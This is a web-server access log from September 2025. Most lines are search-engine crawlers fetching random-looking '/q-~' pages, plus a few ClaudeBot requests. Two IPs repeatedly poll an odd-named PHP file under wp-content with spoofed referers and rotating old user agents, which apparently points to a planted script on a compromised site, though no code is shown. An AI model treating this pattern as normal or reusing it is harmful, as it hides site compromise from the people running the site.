66.249.70.8 - - [18/Sep/2025:00:21:54 -0300] "GET /q-~161CxW7N3CYN2OPFucM7XlYfshAZ59jaS13500/ HTTP/1.1" 200 10374 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:22:14 -0300] "GET /q-~146pAcCDhATqyh9bVdnEMQgW1Gkm6ljbb40685/ HTTP/1.1" 200 10251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:22:34 -0300] "GET /q-~161ZL3mEOIWaVKy7L62Nc0PDoTrR1iSsr13506/ HTTP/1.1" 200 10071 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:23:12 -0300] "GET /q-~161ruJMEj01GhVUi2ZKwASWxnrtT7XFGv13508/ HTTP/1.1" 200 10204 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:21:54 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:23:55 -0300] "GET /q-~161ZCuJ9WKzUXKBgoYpFMWa6Xid1T4uQC13498/ HTTP/1.1" 200 10539 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:24:15 -0300] "GET /q-~161y2dPb3weVXOGHYQPZfIsgUvyizFT4Z13504/ HTTP/1.1" 200 10358 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:24:39 -0300] "GET /q-~149FnXg8lZMyJ87YLkDkeCh9Vw0JliZTg26904/ HTTP/1.1" 200 10815 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:23:23 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.2 - - [18/Sep/2025:00:25:17 -0300] "GET /q-~142AniD0XjnmYkYoL31BDfKcDI7HYqnkp36193/ HTTP/1.1" 200 10571 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:25:37 -0300] "GET /q-~115jZpJoi4NAgCkN3ZYRQEEk88FbLiLiO12344/ HTTP/1.1" 200 11435 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:24:58 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:27:45 -0300] "GET /q-~188FxK55AkI9Ev5x1gbExaxOUgVt0t38f2983/ HTTP/1.1" 200 11164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:26:26 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.2 - - [18/Sep/2025:00:28:10 -0300] "GET /q-~60raycrkC7u6WeGnNpxaUuMqo1hXic9e3959/ HTTP/1.1" 200 11283 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:28:30 -0300] "GET /q-~60ZgIpOKSax0fwesRSrq2u5JKNH2SEwp3893/ HTTP/1.1" 200 10928 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.8 - - [18/Sep/2025:00:28:48 -0300] "GET /q-~48YzNaDytkZFCspFQXC9nmNVesBIioGn23589/ HTTP/1.1" 200 10528 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.8 - - [18/Sep/2025:00:28:50 -0300] "GET /q-~174LE2ZNA18MzjYuj1CEWFbO11FPiSrLy36729/ HTTP/1.1" 200 10645 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.2 - - [18/Sep/2025:00:29:09 -0300] "GET /q-~60NlFOkaDPtDmNfXpZanCdl2jP1pgHre3953/ HTTP/1.1" 200 11551 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:27:59 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:00:29:48 -0300] "GET /q-~2gVEj94W16kNFHhb0zvMM7rllpzhGfD10321/ HTTP/1.1" 200 10327 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:30:16 -0300] "GET /q-~78E01yeUrdGHWS1ohU3gPGkqEqafIBJS5415/ HTTP/1.1" 200 10611 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.8 - - [18/Sep/2025:00:30:20 -0300] "GET /q-~131Ru5BbumHLUoOmJZWDWp47iwKN9cyba19874/ HTTP/1.1" 200 11212 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.8 - - [18/Sep/2025:00:30:35 -0300] "GET /q-~160KkFOtW8tQINzKFCq2IXJgG9a8gEbQS9691/ HTTP/1.1" 200 11291 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.8 - - [18/Sep/2025:00:30:55 -0300] "GET /q-~160S6BZ4BrHDjnUTNIHX9eG8q4eSdrBdI9693/ HTTP/1.1" 200 11810 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:29:35 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:00:31:16 -0300] "GET /q-~176AuXbbfHm8QxfKUP1wkHnrD40mq0mzs28167/ HTTP/1.1" 200 10718 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.8 - - [18/Sep/2025:00:31:54 -0300] "GET /q-~78OEfLHQFNt5wC8jmfNWySZqGCC3x5rx13647/ HTTP/1.1" 200 10825 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.12.208.18 - - [18/Sep/2025:00:31:55 -0300] "GET /wp-content/imec50e5/index.php HTTP/1.1" 200 26 "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.52.7"
69.197.149.50 - - [18/Sep/2025:00:31:10 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:33:25 -0300] "GET /q-~123m9CV48OWejHiunGdaHwbbdAJHKZkfQ22150/ HTTP/1.1" 200 10997 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:32:39 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:00:34:57 -0300] "GET /q-~196l0nktc0MyGRlLHDe3MDKsYeS8pvGHZ47957/ HTTP/1.1" 200 11585 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:34:11 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:36:30 -0300] "GET /q-~11ZqChDdK8vTBO7LvxLVCrETheGAts4A2954/ HTTP/1.1" 200 11112 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:35:40 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:38:02 -0300] "GET /q-~168BJU2ULPGjexKyBs2xnfiSJUgCYJp0L34111/ HTTP/1.1" 200 10794 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:37:14 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:00:39:35 -0300] "GET /q-~69mxTY0Dr2TU3ZMbMtKGGKaSPpk9kmHY39888/ HTTP/1.1" 200 12502 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:38:43 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:00:41:06 -0300] "GET /q-~170JaDSyj2PTUIslP7SZ97t1WT8KwaK6P48973/ HTTP/1.1" 200 11286 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:40:17 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:00:42:39 -0300] "GET /q-~43jXYDiDMxywuNDuG5Iv4aVZBcT7hEBC39418/ HTTP/1.1" 200 11489 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:42:01 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.2 - - [18/Sep/2025:00:44:11 -0300] "GET /q-~140WBzpNrTtDa2QTAythemq6k7pqQTAPF5251/ HTTP/1.1" 200 10938 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.129 - - [18/Sep/2025:00:44:49 -0300] "GET /robots.txt HTTP/1.1" 200 142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [18/Sep/2025:00:44:49 -0300] "GET / HTTP/1.1" 200 923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
69.197.149.50 - - [18/Sep/2025:00:43:33 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.18 - - [18/Sep/2025:00:45:37 -0300] "GET /wp-content/imec50e5/index.php HTTP/1.1" 200 26 "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.24 (KHTML, like Gecko) Iron/11.0.700.2 Chrome/11.0.700.2 Safari/534.24"
66.249.70.1 - - [18/Sep/2025:00:45:43 -0300] "GET /q-~2zvku5vCF7tymXWkQnQFaOdQ5M61neh41185/ HTTP/1.1" 200 11767 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:45:02 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.2 - - [18/Sep/2025:00:47:16 -0300] "GET /q-~164MCQ8KCwVHu5GXf08fXtCcRFn5IqXyZ32373/ HTTP/1.1" 200 9989 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:46:32 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:48:53 -0300] "GET /q-~127vD6R4E11TXsp3Yio2GHOuoJAgiAPYI11364/ HTTP/1.1" 200 11648 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:48:04 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.2 - - [18/Sep/2025:00:50:20 -0300] "GET /q-~160cQw6kSIXHsrVkFwrLWhnyhw3Vh8DqR15091/ HTTP/1.1" 200 12579 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:49:42 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:51:55 -0300] "GET /q-~87gX48RSyYQmk1br7UDwRXqg3q8gJtGW35750/ HTTP/1.1" 200 10884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:51:14 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:52:49 -0300] "GET /q-~127ZWbRPj7vTITIR16YsHQeHAAEVMmA3e10456/ HTTP/1.1" 200 11880 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:53:25 -0300] "GET /q-~128YPfu2edEy4YAaM842zI72PuSSOGiWr14251/ HTTP/1.1" 200 10459 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:53:14 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:54:57 -0300] "GET /q-~100EHTGmJJWeEjJ0hO4QDAgXcXrSrdR6C8297/ HTTP/1.1" 200 13048 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:54:45 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:56:13 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:00:58:02 -0300] "GET /q-~113fDMGT2cBfhDKGPvQno6wYLA91uLq4U3222/ HTTP/1.1" 200 11275 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:57:45 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.18 - - [18/Sep/2025:01:00:07 -0300] "GET /wp-content/imec50e5/index.php HTTP/1.1" 200 26 "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php" "Mozilla/5.0 (Windows NT 6.0; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
66.249.70.2 - - [18/Sep/2025:01:00:32 -0300] "GET /sitemap92.xml HTTP/1.1" 200 67141 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:59:14 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:01:01:06 -0300] "GET /q-~89s88Af6t1xAB7DEuVfRYmel6Ol6o7HC28256/ HTTP/1.1" 200 10446 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:01:00:47 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.2 - - [18/Sep/2025:01:02:40 -0300] "GET /q-~113ysGusCMqplyADZ0JOH33NdQ7gWxwbb35462/ HTTP/1.1" 200 11156 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:01:02:15 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:01:04:11 -0300] "GET /q-~183bR9OIe6hXPbtjml8KNsql4vSnHFGoK21846/ HTTP/1.1" 200 11267 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:01:03:46 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:01:05:43 -0300] "GET /q-~158axsDJ62r8vUqT1rebALqD3twUdkzAe12425/ HTTP/1.1" 200 11321 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:01:05:23 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.2 - - [18/Sep/2025:01:07:16 -0300] "GET /q-~162Ip5JAFyhjfm9SsQ9yYKzz01LM0ARgR10301/ HTTP/1.1" 200 10673 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
